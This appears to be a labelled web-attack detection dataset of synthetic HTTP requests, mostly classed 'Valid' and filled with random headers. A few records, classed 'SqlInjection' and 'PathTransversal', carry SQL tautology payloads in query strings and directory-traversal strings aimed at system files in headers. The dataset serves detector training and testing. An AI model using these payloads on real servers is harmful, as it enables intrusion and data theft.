Referer: /daorty6/tpleri6e/lci4ua.jsp
TE: deflate,chunked
Trailer: TE
User-Agent: ntd6ed/4.2
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: FTP/5.2 www.H4eDEklt.jpeg, 4.5 20.195.110.230, HTTP/2.5 www.ensg.js
Transfer-Encoding: deflate
Upgrade: odee/0.3, hong/9.6, eeicao/8.3
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35727
Start - Id: 1810
class: Valid
GET /1Khlike6MMPconnectDsvdrop/aua0AQiAEXVbIJFPvTYD/vVW3OS0p6Z/0YJUhaJgMk/v7phpP.2WUllinkaSl/jqgcBOnullT/Ltem4eq/YAc-bu4CBpq8AK/nc/tC.FYYbVoQAHlerj/edj/n0eDfde4ms2vk.css?iijztpIonwi=lDi8j&5T5nACusrZaWo=3347&7tiooh4leJste=+tmtjnshiTiei&32QDf=03401&stdsntht=aNaIootig5otenfnll&neyepidn65=cwHl&Jdgch7bot=21&r8hi=4K90gLoai&r5scr8ae=eVRT1v9PvS&enihannMrrph=3348912682&ofYgE=bfromsxml%40-%2F%29e HTTP/1.0
Host: 152.26.211.177
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: eita-tz6eei;q=0.9, py4d-t, M9-t
Cache-Control: max-age=68444
Client-ip: 112.181.5.69
Cookie: jygx0rOXB=uabody~;mcpGomxcPi= o;nQXO0bs9autoexec3G=eh-5k;ety1nes23g=e;eidoodT48e=89116;58dSBl=754
Cookie2: $Version="4"
Date: Thu, 09 Dec 04 06:33:11 CET
ETag: W/"0DQt6FVEumqKmQ8w"
Expect: 100-continue
From: itav@toutp6culd.com
If-Modified-Since: Tue, 23 Oct 07 06:30:00 GMT
If-Unmodified-Since: Fri, 19 Sep 08 09:33:28 CET
If-Match: "bvgce79sUfOnFEPMk6N"
If-None-Match: "ejUH9UITDBnFnVhe1"
If-Range: *
Max-Forwards: 20
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM Yzd0MGhYc25oaDhudDgwcmVhdGVublZld3VkYWFjbGlvZnQ=
Authorization: NTLM d2loWWVsZDFvV29lRXNvbzhsZW11ZmFlc2l1bmF6bm1ubXR2aDFocnRBYXMwcDU=
Range: 9724-,33511-083617,2-
Referer: http://www.hj1soheo.fr/nrextNat/lueGds.sh
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/9.3 (Machintosh; U; PPC Mac OS X 8.6; GD-tm; rv:9.5.2) Gecko/21962726
UA-CPU: x86
UA-Disp: 756,3724,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 912x237
Via: HTTP/0.4 www.smqHeepg.html, HTTP/0.0 www.5iEoltmq.css, hfevt/1.7 98.250.134.140
Transfer-Encoding: gzip
Upgrade: lay/1.3
Warning: 604 27.74.229.180 "uehtEmh0ejdosHSisd" "Mon, 15 Feb 10 03:04:51 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1810
Start - Id: 17327
class: Valid
GET /hIqKNzdUegQcCVw3XNk/srosSoySwlAroo/aGmiBsh/9ngoadhkm/nXCj.5rFYDRh/dludhtttc3lT/iarw0p/aaRmishde3teorzi.htm?ISiabEoovtyet=bnmlt3&mnqim=zphQ&zoo=seaAhwot5n34agof&f7hrbufnuh=e&fqcM=06369&8xess=t4&hlehD6oa=l%3Dl%5Be&6Cn9tmo=eNwannuu%3Cernittr&aocewan=essphhLnAsni7uT&o58v=3507569619&gonsIy8onm=65924&co=%27ew HTTP/1.1
Host: www.fEchtes.de:80
Connection: close
Accept: text/html;q=0.3, video/mpeg;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, gzip, identity;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 251.211.186.188
Cookie: g7Eer0rdaedS=thogHuOls;atu8=s72;rbDsn=8gexNyxs5r;9@Nl=eR2tc/xa<
Cookie2: $Version="3"
Date: Wed, 15 Nov 06 09:11:38 GMT
ETag: W/"yMDXvl2uoFuOP3i"
Expect: 100-continue
From: Ziuts@vomg5.it
If-Modified-Since: Thu, 17 Dec 09 13:31:25 UTC
If-Unmodified-Since: Tue, 16 Oct 07 24:42:10 UTC
If-Match: "a.Y7YtiK0DFRbVqF"
If-None-Match: "JhVZ@tv.XdXvrzLTy"
If-Range: Fri, 19 Oct 07 18:45:13 UTC
Max-Forwards: 717
MIME-Version: 0.0
Pragma: he=fn7ox
Proxy-Authorization: Digest uri=/dEasnr/nifefdsN/jtmItno/tqlthnia/esaa.dll
Authorization: NTLM Mm9hbnRndnN0N2V0NjdiZmZlYWRkaG5rYWl5YXRzYmlzSDFzOWVkbGFxaA==
Range: 570800-
Referer: /IheytL.dll
TE: trailers
Trailer: Range
User-Agent: Mozilla/8.6 (compatible; Konqueror/0.0; WinNT; 0oaniN; isrqb; tteghmtser)
UA-CPU: 68000
UA-Disp: 8556,725,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 455x7663
Via: 1.6 www.aE2no.jpg
Transfer-Encoding: gzip
Upgrade: siw/5.1, pnee/6.8, tnnE/9.7, osHvsm/3.4
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 137.232.96.91
X-Serial-Number: 75371955994853740
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17327
Start - Id: 18086
class: Valid
GET /gept85grulde.asmx? HTTP/1.0
Host: www.n7iirnc4a.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic, utf-7;q=0.1, x-mac-roman, windows-1257;q=0.6, iso-2022-jp
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: 7i='owb'
Client-ip: 117.155.55.63
Cookie: cetS=cobjectncr
Cookie2: $Version="5"
Date: Sat, 29 Aug 09 23:31:13 UTC
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: eprCieoo=fsdos
From: as4ao3rt@lnnha.gov
If-Modified-Since: Sun, 09 Mar 08 10:58:24 CET
If-Unmodified-Since: Fri, 13 Jan 06 09:39:57 CET
If-Match: "uD9GQWnK1.WeSgj8d"
If-None-Match: *
If-Range: "9gSPc49toGp5EYiBx.3m"
Max-Forwards: 985
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: NTLM NG9taW9vdGh0bDF0eXRjb3hJc21hVGVkbW9scnR2ZDVoVGVIYWY=
Range: 05487-,314421-,-1481
Referer: /gei1ip7/gobak.swf
TE: gzip
Trailer: Upgrade
User-Agent: dxadrFeehrcut
UA-CPU: MIPS
UA-Disp: 2004,7271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1961x6711
Via: 8.7 205.12.233.92, 3.8 www.tssit.shtml, 3deiwb/9.6 www.ilsto.jpg
Transfer-Encoding: deflate
Upgrade: dad/1.8, foyho2/4.1
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 31.128.239.22
X-Serial-Number: 7309979
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 18086
Start - Id: 41696
class: SqlInjection
GET /albmmpAclansxti/4b0Hiqh1yZM/s-FzWIM450ZMn6/MinR6jf/tTH26unmU28Zk3n.jpg?EMwDmB0JpT=replacedito%3B&ndhSeutsirtaatr=%27+++++OR++++%27yehnf%27+++++%3E++++%27S HTTP/1.1
Host: www.k7noInnht.net:73
Connection: close
Accept: */*
Accept-Charset: cp-950
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 72.229.64.175
Cookie: hr=soeuoEyen;edimeTs=vbscriptuO
Cookie2: $Version="017"
Date: Sat, 22 Nov 08 01:34:46 CET
ETag: "ms1MadMBVHvYr8Op"
Expect: 100-continue
From: ube8gesO@rdptemmi.st
If-Modified-Since: Sun, 09 Jul 06 02:54:29 CET
If-Unmodified-Since: Sun, 15 Oct 06 13:26:38 UTC
If-Match: *
If-None-Match: "EFoNLokJfKIDxx8stt"
If-Range: Wed, 01 Jun 05 13:30:32 CET
Max-Forwards: 5114
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic QXNlbzBuNVM6ZWVyZWJrdHk=
Range: 271923-
Referer: /wneep0ea/lwt7tn/sZojeMaT.php3
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 2.2; o2-S7; rv:8.2.8) Gecko/67212648
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 128x875
Via: tce/7.4 170.99.27.27, 7.3 www.eOIioun.png, fnleea/4.2 www.paesu.html
Transfer-Encoding: compress
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 137 173.7.112.18 "mIt3it3cidet" "Sun, 16 Sep 07 01:52:40 GMT"
X-Forwarded-For: 200.2.71.249
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41696
Start - Id: 18618
class: Valid
GET /hrh0GRH7zI/MgL6E2P/23-CwQzx776fGM5.K/vhrDEend6aqiS/NeidlEOemtgaKaeek/iww.rx8So8sO/akox7tjnwemutttreioi/hhal5acI0o/eu/d3ApZ6q.php4?ooveot=027594889&ohgSBxzeMa6=rcisua6TwpYO0Buuou&ndi=077820&R75sZqN0updater=+nstdinPxp_BW&rnWhnsgerthadoe=7323546&deatd=2&I@M-tTz0=dtacceptcat&zMIMinputgl=51238473&Lltplitz=95619&hr37cu4it=463&clersoessldoOt=bS+tnviri%3Encap&erhseetr=efroooe&ajGelK=8 HTTP/1.0
Host: www.aqtjtdMEI.biz
Connection: close
Accept: image/*;q=0.1, application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 224.49.207.166
Cookie: 7tdtpwz3hdFl=jdGg0xPW;eldedfnbIo1tn=iA8fYjjUN;nnias=fqj0UOK3z;ollr=askeifsrfv8t]0h;tc6MZidqF=A7htpassn;rbt=Hr85snU
Cookie2: $Version="38"
Date: Sun, 12 Aug 07 06:11:21 UTC
ETag: "@LZVa7ZT2QWniMH"
Expect: 100-continue
From: aAwintj@honhi.org
If-Modified-Since: Mon, 06 Sep 04 15:51:47 GMT
If-Unmodified-Since: Wed, 14 Sep 05 03:30:33 GMT
If-Match: *
If-None-Match: "vvo7UrVRATxP3fzyh.dW"
If-Range: Mon, 15 Feb 10 13:42:01 GMT
Max-Forwards: 0
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest username="2qmhq41"
Authorization: Vreca tneo=ttcet
Range: -0
Referer: http://suhaH.de/lgnw/aoktwhno/3eSy8o/geNrtzn0/ei8zOreD.tar.gz
TE: gzip,deflate;q=0.5,chunked;q=0.3
Trailer: Pragma
User-Agent: li2am (w8AR9cPgD; ggscN7g8he; rdn@qc; lVRTfZ55; m-ZOOf)
UA-CPU: 68000
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7882x967
Via: reh/8.8 0.21.111.57:58983, HTTP/7.9 73.195.133.226, FTP/0.1 5.94.74.243
Transfer-Encoding: deflate
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 858 www.lwelElt3.png "1bxSreEt8b" "Fri, 04 Jun 04 02:26:38 UTC"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 41593026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 18618
Start - Id: 36189
class: PathTransversal
POST /BYiNXVXgBh.pl? HTTP/1.0
Content-Length: 228
Content-Language: eomnm,yomTeao,mnttwpse
Content-Encoding: gzip
Content-Location: /VAtgcc/weyFbr.jsp
Content-MD5: aG15dGFkRWd2ZWluZWNtdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 May 06 08:36:09 UTC
Last-Modified: Mon, 10 Aug 09 04:24:06 CET
Host: www.aPeg.com:80
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *;q=0.1
Accept-Encoding: ../../../../../../../../../usr/yo.bat
Accept-Language: n:\\WINNT\\win.ini
Cache-Control: no-transform
Client-ip: 196.9.89.103
Cookie: noin6ohyi2=asTqi;sn=aeesuiwr1nsfo;kpq2=hi;VN4Joptc3U=BiresrdeIwttot;eedO=7319
Date: Mon, 12 Feb 07 12:48:33 UTC
ETag: "eGwBaRA24wjBRT_nUC"
Expect: 100-continue
From: 5uhy@ih5iar.uk
If-Modified-Since: Sat, 21 Jan 06 23:51:35 GMT
If-Unmodified-Since: Fri, 16 Sep 05 16:35:54 CET
If-Match: "dFuRUE9IJL_ONJZO71"
If-None-Match: "hFL-nNxVRpJmwLj2RUva"
If-Range: *
Max-Forwards: 8555
MIME-Version: 2.6
Pragma: aneQa='uvuhrd'
Proxy-Authorization: emiius i5ge=rTmnwt
Authorization: fs3mas yynattw=lroh
Referer: http://www.inpnt.st/oyaoi.swf
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.1 (Windows; U; Win98 4.2; ym-ft; rv:3.5.4) Gecko/45862145
Via: HTTP/7.4 www.c996A.png, 7.6 www.gfhrc.png, 6.3 www.Ten6.png
Transfer-Encoding: identity
Upgrade: sn8ar/0.2, sdt/9.0
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tuRatlea9hdna=altylo2replacetqswIn&er9z2ossobarc=;&zgnck1tesi1dt1=tJn.QOj&ti6lqjioepu=7307684&d5rtdqcsrD8ro=gkfAiIGwnFl&anaik=92820000&NwhereOqmcatAYbWd=iZwfACt&dn8wI=s9o9dD@fOgKr&mt=aRMLxVe1lc&eroaohcn=CiPprfm0&cCr3h1IXj=7o

End - Id: 36189
Start - Id: 18858
class: Valid
GET /TSthlos9bymq.bin?4ltenutuarrtd=+I-t&isrhiDudutsh=%3D&snt3r=n%3Ccpnotha%3D&@e3dbP=idrop&smg67soOwBTG=Yt2&dtsssr=es3Qu&5daecznqpW=1908706016&afoHsidh=095&lL_4=8213300506&secneDf=bdnl&nCq7vgran=i1wyz3T3P&yM08winntD2vcRT=kelqv1%2Bnoeso8ng HTTP/1.1
Host: www.l9oTuTv1aI.com
Connection: keep-alive
Accept: audio/x-wav, image/*;q=0.4, video/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: mu-o;q=0.2, sReco-6esdox;q=0.2, cise-wtntuod;q=0.3
Cache-Control: no-cache
Client-ip: 108.170.236.163
Cookie: e3hisy=Dseurtatylk;ioHOl0dhtEpi=cuefrro;gaWVktelnetk=453069;nci6tur57r==8Nrb0dechoRetcdeletemx:0
Cookie2: $Version="00"
Date: Fri, 07 Mar 08 14:43:50 CET
ETag: W/"6ZrYY90QHeyeZaJNoL1G"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Sun, 07 Sep 08 13:11:18 GMT
If-Unmodified-Since: Fri, 15 Apr 05 04:12:45 GMT
If-Match: "gFc@P5Sgn-rAK@3h27"
If-None-Match: *
If-Range: "51goknJd9DJJ2Cg8"
Max-Forwards: 034
MIME-Version: 6.9
Pragma: rDLmyTio='ouamo'
Proxy-Authorization: jniene rlc0of=edatai
Authorization: Digest opaque="urietee"
Range: 33-,46-263308
Referer: /lpon/dkIg9cnp/eaPnaE/fzopvt6.txt
TE: trailers,trailers
Trailer: Host
User-Agent: kAvouNojee
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 928x9572
Via: 2.3 www.w5fnIuo.gif, 9.1 www.szrgro.js:92
Transfer-Encoding: compress
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 764 36.12.45.78 "losey4rd3" 
X-Forwarded-For: 77.105.66.53
X-Serial-Number: 584200237476293
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18858
Start - Id: 35199
class: SqlInjection
GET /8DW.Zc0OnzB4/rUW0hSxGLlVtqjawt8/hqPcR7pmjz_@1pZFUHi/uU_UvzHW17LaG/tO@Z6.sC7S7gJn/oFqRFPx/otb/btADEv-N5iDFPlSKOB/eha6COFOtTaopteval/37U0window.open0insert0KfyG.@/3ybrc/ctodmveraatnso4tehq5.pl?uvnhr=etU3eettWgoiE&deic=onKGxhczt4&tamri=18714&3-.yAMA=C++e&9bei7roecuo5yTu=3ietc&ht=32747815&daassir=%27++++OR++++%27%27++%3D%27&aleheot6sorza=9185 HTTP/1.0
Host: www.ihl9o.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.4, compress;q=0.8, compress;q=0.5, deflate;q=0.7
Accept-Language: ftjixnt-hntarchE, fot8saDl-s;q=0.5, t-eimh4d3
Cache-Control: only-if-cached
Client-ip: 78.116.124.236
Cookie: qjPdocument=otail;rnnt=smaqise
Cookie2: $Version="703"
Date: Wed, 26 Mar 08 06:11:16 CET
ETag: "oJj9dXVOzYu6K3_qCx"
Expect: 100-continue
From: os33et6k@EniiktZna.uk
If-Modified-Since: Thu, 15 Nov 07 17:26:46 UTC
If-Unmodified-Since: Sun, 20 Sep 09 19:45:48 CET
If-Match: "VUm7f@B3lEfMzZ1"
If-None-Match: *
If-Range: Sat, 21 Apr 07 23:44:59 CET
Max-Forwards: 0292
MIME-Version: 2.2
Pragma: rrsbnh='ed81bah'
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: NTLM aHk3Zm90bWFob0ltbml0c3Rhc2xhSzBjbzJ0c241dHU=
Range: 91-
Referer: /qfmGMmal/es0t/3e3Dbias.php
TE: trailers,trailers
Trailer: Accept
User-Agent: mhrtsnaf/6.4.8
UA-CPU: StrongARM
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/5.2 33.31.52.42, 8.5 www.tdiachph.shtml, tebtFq/6.6 141.207.69.208
Transfer-Encoding: compress
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35199
Start - Id: 27362
class: Valid
GET /MHftJA4Handccs/tryin2hcls6tdrie/bH1pyJ.gif? HTTP/1.0
Host: www.kwvaa.com:80
Connection: Cr1sBo
Accept: image/gif, audio/*
Accept-Charset: x-mac-hebrew;q=0.6, x-mac-chinesetrad, cp-950;q=0.5
Accept-Encoding: deflate;q=0.9, identity
Accept-Language: *
Cache-Control: min-fresh=24
Client-ip: 216.117.63.126
Cookie: weutsios8=594
Cookie2: $Version="666"
Date: Fri, 03 Nov 06 03:04:56 UTC
ETag: "3ooz@O1DCCjzfQ_jl"
Expect: 100-continue
From: awwHpt2M@rHe8oL7N.net
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Sat, 20 Jun 09 05:06:44 CET
If-Match: "t79yLfeNm3Q7swGqIlP"
If-None-Match: "PqQuZiauDwmJ@b149CaT"
If-Range: Sat, 22 Nov 08 22:22:16 CET
Max-Forwards: 517
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic b2FlYTpkaXR1aXJzcw==
Authorization: Digest realm
Range: 0920-857572
Referer: http://92tetf.ch/5SthMf/tlnil/nisvDlja/tiodomne.txt
TE: trailers,trailers,chunked;q=0.8
Trailer: Cache-Control
User-Agent: twnabPpe/6.6.8.4.2
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9698x542
Via: 5.5 146.231.130.130, 4.7 117.81.239.13, zih/5.5 165.191.80.201
Transfer-Encoding: compress
Upgrade: eeW/8.4, 80lvm/8.7, iuez/6.4
Warning: 877 60.179.127.50 "ccGMviphn5uaaes" "Sun, 24 Jun 07 15:48:47 UTC"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 7259766093580029
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27362
Start - Id: 24619
class: Valid
GET /a@z87v1LRi.qf7h0Xtc/hbkuICnT@BJtq_71Cl_V/t8x8@V7uF5pEg/MsMXxmlbNCAj/ZF/tsNd2eicinind2toite/r6BBBUoyK6vSF1/okasymysetf5es0zkhni/taoet3dT6zIcd2te/iE4etL/nboendrrtvt87D/ohL5fVX1OIJI@CBNJ9pH.exe?1tlgyso1g=ge36tot2bor HTTP/1.1
Host: www.3snt.org
Connection: sed8aedm
Accept: */*
Accept-Charset: shift_jis;q=0.4, x-mac-roman
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 63.118.153.135
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="89"
Date: Tue, 28 Sep 04 19:30:32 UTC
ETag: W/"gxM-KAWB7.0f.MAhdFV"
Expect: 100-continue
From: utgowu@dmbui.org
If-Modified-Since: Fri, 11 May 07 17:41:13 UTC
If-Unmodified-Since: Thu, 17 Nov 05 24:21:24 CET
If-Match: *
If-None-Match: "Zimx3-zZ7.BK_Otv"
If-Range: "8ZvR9iJ6Msb25zM"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="priNoo8"
Authorization: Digest qop=auth-int
Range: -633614,846-,145-
Referer: http://steEs3t.uk/rweabx/e8ete/ln5qlc/dr2ure/ehtrr4d.jpeg
TE: gzip;q=0.0,gzip
Trailer: Host
User-Agent: wr0md/6.1.5
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4948x889
Via: iij/9.4 www.sirx.htm, HTTP/0.0 www.Bmnb.js, FTP/1.5 www.recsi.jpg
Transfer-Encoding: identity
Upgrade: lha/0.0, onynn/5.1, e0f2s5/9.2, leAc/8.0
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24619
Start - Id: 18213
class: Valid
GET /uecmxesfitcznennbdAy/lE65HPLgLK/35T18/oE/stedtsteen.htm?ijjO=1&swiiadYn=%28%28t&rRsioa=kUsahehv%28rusrirN&grseohNc4ah=34598&aSp2Temhossk=iy4okOP3mE5A HTTP/1.0
Host: www.FaeeI.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 18.171.181.243
Cookie: intnnLweraec=eic;wEKDiutfantttn=\TtAbdgni
Cookie2: $Version="9"
Date: Sun, 14 May 06 09:09:35 UTC
ETag: W/"kbsG2wxTIYHzOzT-h"
Expect: shsz
From: 1rhtah@f5rw.de
If-Modified-Since: Fri, 30 Jan 04 09:20:42 GMT
If-Unmodified-Since: Wed, 23 Nov 05 18:29:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0352
MIME-Version: 0.5
Pragma: saey='qee3ytn'
Proxy-Authorization: udkE o8jpteaz=eet8ehdn
Authorization: Digest opaque="waeurooO"
Range: 27-4,-74
Referer: http://edTd2k.st/4uuyeteE/5keo.mspx
TE: trailers,deflate;q=0.8
Trailer: Trailer
User-Agent: Mozilla/9.8 (X11; U; Solaris 0.9; es-l9; rv:4.9.1) Gecko/58187687
UA-CPU: PowerPC
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 810x317
Via: 9.7 146.141.142.83:07611
Transfer-Encoding: compress
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 8413753908190
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18213
Start - Id: 14343
class: Valid
GET /2emtEi2.css? HTTP/1.0
Host: www.sh4n.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate;q=0.0, gzip, gzip, gzip
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 158.75.123.47
Cookie: eey1trA=4534;sE3kksoo4amen=a1NmWYOLN;zEh.N1kX3NF-=5;eiusulidtq2pY=s]%eritl1aonpLu;ugsliii4taeoihl=eW071Xweh;eau2fni=ituwofly6sr-pnftpeefeq
Cookie2: $Version="48"
Date: Sat, 14 Nov 09 17:07:20 GMT
ETag: "ueRPEkOskSd4hNa"
Expect: tb3h=iefln
From: dn4yib@8dee.fr
If-Modified-Since: Sat, 22 Dec 07 24:43:48 UTC
If-Unmodified-Since: Mon, 22 Jan 07 22:09:18 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Jul 06 07:50:09 GMT
Max-Forwards: 27
MIME-Version: 0.3
Pragma: 2wnfz=na
Proxy-Authorization: n2ei eOtdo=hm8idc
Authorization: iagn aFztxZx=fogjne
Range: 15-8,471-,533189-4
Referer: /f5yao/ey8ua/srvpa/TePime6t/bKtttt.png
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 0.0; ot-eh; rv:6.2.1) Gecko/26125383
UA-CPU: StrongARM
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: HTTP/0.2 www.Nuhdm.shtml
Transfer-Encoding: identity
Upgrade: aoden/2.1, dhp/1.9, 6sUhhi/0.0
Warning: 189 196.13.70.59:228 "tltsnki6ief" "Fri, 30 Apr 10 24:43:17 GMT"
X-Forwarded-For: 86.196.76.2
X-Serial-Number: 202713931770679449
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14343
Start - Id: 29699
class: Valid
GET /LT/eoxkHot4t/ZetmNLrP.shtml?9KyD-nullfromH=nmltpeiotnton3&st3lz9sn8=HpatateFoatc&mydn=aC%5D&MdDLps=91118&tdtewsseuo=e%400e10AI24OB&BcQscriptSBTechomL=9oa0oAdeF%3D&no=sWC6nV2Is&0Th=525353365&n6i=aAwrrhs9srcyushab&entaoYntayh0=03135906&Ry0tmpYx=uedagd5tbDda0ei&oolKteLdeeeheuA=cqI07JDLb HTTP/1.0
Host: 8.150.6.142:7237
Connection: keep-alive
Accept: image/gif;q=0.2, text/xml
Accept-Charset: x-mac-chinesesimp;q=0.9
Accept-Encoding: gzip;q=0.7
Accept-Language: *;q=0.8
Cache-Control: min-fresh=01
Client-ip: 122.128.237.104
Cookie: V5KKt=er2uJoN@%l[%E|h;mrhttppl8cmdUl0ah6=1669617
Cookie2: $Version="29"
Date: Thu, 09 Dec 04 10:44:05 UTC
ETag: "GhVCu8H@TbsGDg7rOx"
Expect: 100-continue
From: njg5eg@oAteadaav.fr
If-Modified-Since: Fri, 17 Mar 06 17:29:22 CET
If-Unmodified-Since: Thu, 17 Jun 04 01:53:40 UTC
If-Match: "dNrsOt1U7d@JCBrHTY"
If-None-Match: *
If-Range: "kPbJdNWRe41DY2hk"
Max-Forwards: 842
MIME-Version: 9.2
Pragma: esnsan=j5efrsdt
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: NTLM cWFyd3Nob2NxdGhsc3I3clViZnRyeW9lb2ROc3RmZWNyb3JybXlvbWVnOXN6
Range: -551432,8-
Referer: /atk3nk/Tet4tmN/sldnag/tnanacn/v7omoq.mp3
TE: trailers,trailers
Trailer: Accept
User-Agent: caam (oMBHh1; eKktJQXkNM; qFX@ZD)
UA-CPU: MIPS
UA-Disp: 0427,819,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7452x2793
Via: 7.6 114.215.173.88, ueul/0.5 25.21.35.137:1584
Transfer-Encoding: deflate
Upgrade: vdqdss/4.7, wsibnl/9.2
Warning: 418 www.hcps.jpeg "st4ann" "Sat, 22 Sep 07 02:49:49 CET"
X-Forwarded-For: 25.252.143.178
X-Serial-Number: 149051815209
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29699
Start - Id: 24480
class: Valid
GET /ovvQBmxYee8zx/r9muhZ-4/PDffWS/botehEt/indyee/temape/Wtin/ieais9Ocritkcioinxb.asp?rc2i0ocennoL=978&samWCrnS=89&Y82Hfx@3=deOhllnu0ryisllkHa&lAaxyrUpitpelst=4572&hrqnaarZ7M=AvsLlphph+%24ea&Cs2=sPZ4_F&b1iieoYgia5=gmyo&llsajnod97Eao3=tesomrtaeaiiu+ HTTP/1.1
Host: www.anoetiwtuw.it
Connection: 9et9
Accept: */*
Accept-Charset: x-mac-korean, windows-1253;q=0.8, iso-8859-1;q=0.1, iso-10646-ucs-2;q=0.8
